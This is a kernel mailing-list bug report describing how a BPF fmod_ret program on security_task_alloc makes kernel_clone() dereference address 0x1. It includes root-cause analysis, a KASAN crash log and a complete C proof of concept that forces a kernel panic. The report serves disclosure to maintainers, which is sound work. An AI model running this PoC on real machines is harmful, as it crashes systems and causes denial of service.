Null-Pointer Dereference in kernel_clone() via BPF fmod_ret on security_task_alloc

1 view
Skip to first unread message

Quan Sun

unread,
Apr 11, 2026, 1:42:46 AMApr 11
to dan...@iogearbox.net, b...@vger.kernel.org, ddd...@hust.edu.cn, M2024...@hust.edu.cn, dz...@hust.edu.cn, hust-os-ker...@googlegroups.com, ak...@linux-foundation.org, da...@kernel.org, lorenzo...@oracle.com
Our fuzzing found a Null-Pointer Dereference / General Protection Fault
vulnerability in the Linux kernel BPF and process management subsystems.
The issue is triggered when a `BPF_PROG_TYPE_TRACING` program with
`BPF_MODIFY_RETURN` is attached to `security_task_alloc`, forcing a
positive return value. This bypasses the `IS_ERR()` check in
`kernel_clone()`, causing the kernel to treat `0x1` as a valid
`task_struct` pointer and dereference it.

Reported-by: Quan Sun <202209...@std.uestc.edu.cn>
Reported-by: Yinhao Hu <ddd...@hust.edu.cn>
Reported-by: Kaiyan Mei <M2024...@hust.edu.cn>
Reviewed-by: Dongliang Mu <dz...@hust.edu.cn>

## Root Cause

This vulnerability is caused by a semantic gap between the eBPF
`fmod_ret` capability and the strict state machine assumptions of the
kernel's internal process creation and cleanup paths.

1. A tracing program is loaded as `BPF_PROG_TYPE_TRACING` with
`expected_attach_type = BPF_MODIFY_RETURN` and attached via BTF to the
security hook `security_task_alloc`.
2. The BPF program is designed to override the normal behavior of
`security_task_alloc` and forcibly return a non-zero error value (e.g.,
`-ENOMEM` or `1`).
3. User space triggers a process creation syscall (like `fork` or
`clone`). The kernel invokes `copy_process` to allocate and initialize a
new `task_struct` for the child process.
4. `copy_process` invokes `security_task_alloc`. Due to the attached BPF
program, it returns the positive value `1`.
5. `copy_process` treats any non-zero return from `security_task_alloc`
as a failure. It aborts initialization, cleans up, and returns the error
code cast to a pointer via `ERR_PTR(1)` (which evaluates to the memory
address `0x1`).
6. In `kernel_clone()`, the kernel uses the `IS_ERR()` macro to check if
the returned `task_struct *p` is an error pointer. However, `IS_ERR()`
only checks for negative error codes in the range `[-MAX_ERRNO, -1]`.
Since `0x1` is not in this range, the check `IS_ERR(p)` evaluates to
`false`.
7. The kernel incorrectly assumes `p` is a valid `task_struct` pointer
and proceeds to call `get_task_pid(p, PIDTYPE_PID)`. This dereferences
the invalid address `0x1` (plus the offset of the `thread_pid` field),
triggering a general protection fault or null-pointer dereference.

#### Execution Flow Visualization

```text
Vulnerability Execution Flow
|
|--- 1. `bpf(BPF_PROG_LOAD, ...)` loads tracing program
| |
| `-- Program type: `BPF_PROG_TYPE_TRACING`
| Attach type: `BPF_MODIFY_RETURN`
| Program is set to return an error (e.g., 1)
|
|--- 2. Program attachment via BTF
| |
| `-- Attach to target function: `security_task_alloc`
|
|--- 3. User triggers `fork()` / `clone()`
| |
| `-- `kernel_clone` -> `copy_process`
| |
| |-- Allocates bare `task_struct` (many pointers are still NULL)
| |-- Calls `security_task_alloc(task)`
|
|--- 4. fmod_ret trampoline invokes BPF program
| |
| `-- Program forces `security_task_alloc` to return 1 (positive
error code)
|
|--- 5. `copy_process` aborts and returns `ERR_PTR(1)` (address 0x1)
| |
| `-- `kernel_clone` evaluates `IS_ERR(p)`
| |
| `-> `IS_ERR((void *)1)` evaluates to `false`!
| |
| `-> Kernel proceeds, assuming `p = 0x1` is a valid
`task_struct` pointer
| |
| `-> `get_task_pid(p)` accesses `0x1 + offset` -> Crash!
```

## Reproduction Steps

1. Load a tracing `fmod_ret` BPF program that:
- Takes the necessary arguments for `security_task_alloc`.
- Directly returns a non-zero value.
2. Attach the program to the valid BTF function id for
`security_task_alloc` obtained from the kernel image (using
`BPF_MODIFY_RETURN`).
3. Trigger the process creation path by calling `fork()` or `clone()`
from user space.
4. The execution of the cleanup routine handling the artificial error
will cause the kernel to crash with a generic protection fault or page
fault due to the null pointer access.

## KASAN Report

```text
[ 203.374516][ T9921] Oops: general protection fault, probably for
non-canonical addresI
[ 203.376012][ T9921] KASAN: null-ptr-deref in range
[0x00000000000006a0-0x000000000000]
[ 203.377050][ T9921] CPU: 0 UID: 0 PID: 9921 Comm: poc Not tainted
7.0.0-rc5-g6f6c794d
[ 203.378250][ T9921] Hardware name: QEMU Standard PC (i440FX + PIIX,
1996), BIOS 1.15.4
[ 203.379375][ T9921] RIP: 0010:get_task_pid+0x92/0x390
[ 203.380036][ T9921] Code: 85 db 0f 85 f5 00 00 00 e8 7b ba 38 00 48
81 c5 a0 06 00 009
[ 203.382417][ T9921] RSP: 0018:ffa000000288fc88 EFLAGS: 00010206
[ 203.383164][ T9921] RAX: dffffc0000000000 RBX: 0000000000000000 RCX:
ffffffff8186b698
[ 203.384041][ T9921] RDX: 00000000000000d4 RSI: ffffffff8186b6b1 RDI:
0000000000000005
[ 203.384961][ T9921] RBP: 00000000000006a1 R08: 0000000000000000 R09:
0000000000000001
[ 203.385885][ T9921] R10: 0000000000000000 R11: 0000000000000007 R12:
0000000000000001
[ 203.386823][ T9921] R13: 0000000000000000 R14: 0000000000000001 R15:
00007f8e1d374690
[ 203.387796][ T9921] FS: 00007f8e1d3743c0(0000)
GS:ff110000cd71d000(0000) knlGS:000000
[ 203.388893][ T9921] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 203.389699][ T9921] CR2: 00007f8e1d4015b0 CR3: 000000002ffee000 CR4:
0000000000753ef0
[ 203.390679][ T9921] PKRU: 55555554
[ 203.391105][ T9921] Call Trace:
[ 203.391520][ T9921] <TASK>
[ 203.391882][ T9921] kernel_clone+0x1a1/0x900
[ 203.392438][ T9921] ? __pfx_kernel_clone+0x10/0x10
[ 203.393083][ T9921] ? vfs_write+0x66d/0x1180
[ 203.393672][ T9921] ? vfs_write+0x16e/0x1180
[ 203.394238][ T9921] ? __pfx_tty_write+0x10/0x10
[ 203.394847][ T9921] ? __pfx_vfs_write+0x10/0x10
[ 203.395445][ T9921] __do_sys_clone+0xce/0x120
[ 203.396018][ T9921] ? __pfx___do_sys_clone+0x10/0x10
[ 203.396691][ T9921] ? ksys_write+0x1a8/0x240
[ 203.397268][ T9921] ? __pfx_ksys_write+0x10/0x10
[ 203.397872][ T9921] do_syscall_64+0x11b/0xf80
[ 203.398474][ T9921] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 203.399230][ T9921] RIP: 0033:0x7f8e1d483353
[ 203.399792][ T9921] Code: 00 00 00 00 00 66 90 64 48 8b 04 25 10 00
00 00 45 31 c0 310
[ 203.402139][ T9921] RSP: 002b:00007fff9b58b538 EFLAGS: 00000246
ORIG_RAX: 000000000008
[ 203.403154][ T9921] RAX: ffffffffffffffda RBX: 0000000000000000 RCX:
00007f8e1d483353
[ 203.404110][ T9921] RDX: 0000000000000000 RSI: 0000000000000000 RDI:
0000000001200011
[ 203.405084][ T9921] RBP: 0000000000000000 R08: 0000000000000000 R09:
0000000000000064
[ 203.406050][ T9921] R10: 00007f8e1d374690 R11: 0000000000000246 R12:
0000000000000001
[ 203.407029][ T9921] R13: 00007fff9b58c8c8 R14: 000055c2141e6dc8 R15:
00007f8e1d629020
[ 203.408036][ T9921] </TASK>
[ 203.408427][ T9921] Modules linked in:
[ 203.408985][ T9921] ---[ end trace 0000000000000000 ]---
[ 203.409802][ T9921] RIP: 0010:get_task_pid+0x92/0x390
[ 203.410306][ T9921] Code: 85 db 0f 85 f5 00 00 00 e8 7b ba 38 00 48
81 c5 a0 06 00 009
[ 203.412180][ T9921] RSP: 0018:ffa000000288fc88 EFLAGS: 00010206
[ 203.413861][ T5172] Oops: general protection fault, probably for
non-canonical addresI
[ 203.415113][ T5172] KASAN: null-ptr-deref in range
[0x00000000000006a0-0x000000000000]
[ 203.415880][ T5172] CPU: 0 UID: 0 PID: 5172 Comm: systemd-journal
Tainted: G D
[ 203.417080][ T5172] Tainted: [D]=DIE
[ 203.417407][ T5172] Hardware name: QEMU Standard PC (i440FX + PIIX,
1996), BIOS 1.15.4
[ 203.418245][ T5172] RIP: 0010:get_task_pid+0x92/0x390
[ 203.418800][ T5172] Code: 85 db 0f 85 f5 00 00 00 e8 7b ba 38 00 48
81 c5 a0 06 00 009
[ 203.420890][ T5172] RSP: 0018:ffa000000268fc88 EFLAGS: 00010206
[ 203.421442][ T5172] RAX: dffffc0000000000 RBX: 0000000000000000 RCX:
ffffffff8186b698
[ 203.422166][ T5172] RDX: 00000000000000d4 RSI: ffffffff8186b6b1 RDI:
0000000000000005
[ 203.423114][ T5172] RBP: 00000000000006a1 R08: 0000000000000000 R09:
0000000000000000
[ 203.423884][ T5172] R10: 0000000000000000 R11: ffa000000268f7a6 R12:
0000000000000000
[ 203.424744][ T5172] R13: 0000000000000000 R14: 0000000000000001 R15:
00007f3f260fc990
[ 203.425464][ T5172] FS: 00007f3f26e925c0(0000)
GS:ff110000cd71d000(0000) knlGS:000000
[ 203.426288][ T5172] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 203.426896][ T5172] CR2: 00007f3f25286988 CR3: 000000002a871000 CR4:
0000000000753ef0
[ 203.427631][ T5172] PKRU: 55555554
[ 203.427964][ T5172] Call Trace:
[ 203.428294][ T5172] <TASK>
[ 203.428565][ T5172] kernel_clone+0x1a1/0x900
[ 203.428989][ T5172] ? __pfx_kernel_clone+0x10/0x10
[ 203.429474][ T5172] ? css_rstat_updated+0x1c5/0x570
[ 203.429941][ T5172] ? __pfx___handle_mm_fault+0x10/0x10
[ 203.430467][ T5172] ? sigprocmask+0x23f/0x340
[ 203.430923][ T5172] ? __might_fault+0x13d/0x190
[ 203.431391][ T5172] __do_sys_clone+0xce/0x120
[ 203.431831][ T5172] ? __pfx___do_sys_clone+0x10/0x10
[ 203.432449][ T5172] ? rcu_is_watching+0x12/0xc0
[ 203.432927][ T5172] do_syscall_64+0x11b/0xf80
[ 203.433359][ T5172] entry_SYSCALL_64_after_hwframe+0x77/0x7f
[ 203.433927][ T5172] RIP: 0033:0x7f3f27327af2
[ 203.434333][ T5172] Code: 85 ff 74 3e 48 83 e6 f0 74 38 48 89 4e f8
48 83 ee 10 48 890
[ 203.436383][ T5172] RSP: 002b:00007fff5ab32c78 EFLAGS: 00000202
ORIG_RAX: 000000000008
[ 203.437367][ T5172] RAX: ffffffffffffffda RBX: 00007f3f272a7ef0 RCX:
00007f3f27327af2
[ 203.438093][ T5172] RDX: 00007f3f260fc990 RSI: 00007f3f260fbd70 RDI:
00000000003d0f00
[ 203.438847][ T5172] RBP: 00007f3f260fc6c0 R08: 00007f3f260fc6c0 R09:
00007f3f260fc6c0
[ 203.439871][ T5172] R10: 00007f3f260fc990 R11: 0000000000000202 R12:
fffffffffffffdc8
[ 203.440749][ T5172] R13: 0000000000000000 R14: 00007fff5ab32cd0 R15:
00007f3f258fc000
[ 203.441653][ T5172] </TASK>
[ 203.441939][ T5172] Modules linked in:
[ 203.442375][ T5172] ---[ end trace 0000000000000000 ]---
[ 203.443083][ T9921] RAX: dffffc0000000000 RBX: 0000000000000000 RCX:
ffffffff8186b698
[ 203.444074][ T9921] RDX: 00000000000000d4 RSI: ffffffff8186b6b1 RDI:
0000000000000005
[ 203.445070][ T9921] RBP: 00000000000006a1 R08: 0000000000000000 R09:
0000000000000001
[ 203.445916][ T9921] R10: 0000000000000000 R11: 0000000000000007 R12:
0000000000000001
[ 203.446834][ T9921] R13: 0000000000000000 R14: 0000000000000001 R15:
00007f8e1d374690
[ 203.447609][ T9921] FS: 00007f8e1d3743c0(0000)
GS:ff110000cd71d000(0000) knlGS:000000
[ 203.448531][ T9921] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 203.449344][ T9921] CR2: 00007f3f25286988 CR3: 000000002ffee000 CR4:
0000000000753ef0
[ 203.450323][ T9921] PKRU: 55555554
[ 203.450782][ T9921] Kernel panic - not syncing: Fatal exception
[ 203.451592][ T9921] Kernel Offset: disabled
[ 203.452135][ T9921] Rebooting in 86400 seconds..
```

## Proof of Concept

The following C program demonstrates the vulnerability on the latest
bpf-next (commit 6f6c794d0ff05dab1fa4677f39043de8a6a80da3)

### How BTF_ID is obtained

The PoC uses `BPF_MODIFY_RETURN`, so `attach_btf_id` must be the
function BTF id from the exact running kernel image (the `vmlinux` used
by the VM). To find the BTF ID for `security_task_alloc`:

```bash
bpftool btf dump file /path/to/vmlinux | grep "FUNC 'security_task_alloc'"
```

Example output:
```text
[XXXXX] FUNC 'security_task_alloc' type_id=YYYYY linkage=static
```

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <linux/bpf.h>
#include <string.h>
#include <bpf/btf.h>

int main() {
int expected_id = -1;
struct btf *b = btf__parse("/sys/kernel/btf/vmlinux", NULL);
if (!b) return 1;
for (int i = 1; i <= btf__type_cnt(b) - 1; i++) {
const struct btf_type *t = btf__type_by_id(b, i);
if (btf_is_func(t)) {
const char *name = btf__name_by_offset(b, t->name_off);
if (strcmp(name, "security_task_alloc") == 0) {
expected_id = i;
break;
}
}
}
if (expected_id < 0) {
printf("Failed to find BTF ID for security_task_alloc\n");
return 1;
}
printf("BTF ID: %d\n", expected_id);

struct bpf_insn insns[] = {
{ 0xb7, BPF_REG_0, 0, 0, 1 }, // r0 = 1
{ 0x95, 0, 0, 0, 0 } // exit
};

char log_buf[4096] = {0};
union bpf_attr attr;
memset(&attr, 0, sizeof(attr));
attr.prog_type = BPF_PROG_TYPE_TRACING;
attr.insn_cnt = 2;
attr.insns = (uint64_t)insns;
attr.license = (uint64_t)"GPL";
attr.log_level = 1;
attr.log_size = sizeof(log_buf);
attr.log_buf = (uint64_t)log_buf;
attr.expected_attach_type = 26; // BPF_MODIFY_RETURN
attr.attach_btf_id = expected_id;

int prog_fd = syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
if (prog_fd < 0) {
printf("bpf_prog_load failed: %s\n", log_buf);
return 1;
}
printf("Loaded prog %d\n", prog_fd);

union bpf_attr link_attr;
memset(&link_attr, 0, sizeof(link_attr));
link_attr.link_create.prog_fd = prog_fd;
link_attr.link_create.target_fd = 0;
link_attr.link_create.attach_type = 26;
int link_fd = syscall(__NR_bpf, BPF_LINK_CREATE, &link_attr,
sizeof(link_attr));
if (link_fd < 0) {
perror("bpf_link_create failed");
return 1;
}
printf("Linked %d\n", link_fd);

printf("Forking to trigger panic...\n");
fork();
return 0;
}
```

## Kernel Configuration Requirements for Reproduction

The vulnerability can be triggered with the kernel config in the attachment.
config-next
Reply all
Reply to author
Forward
0 new messages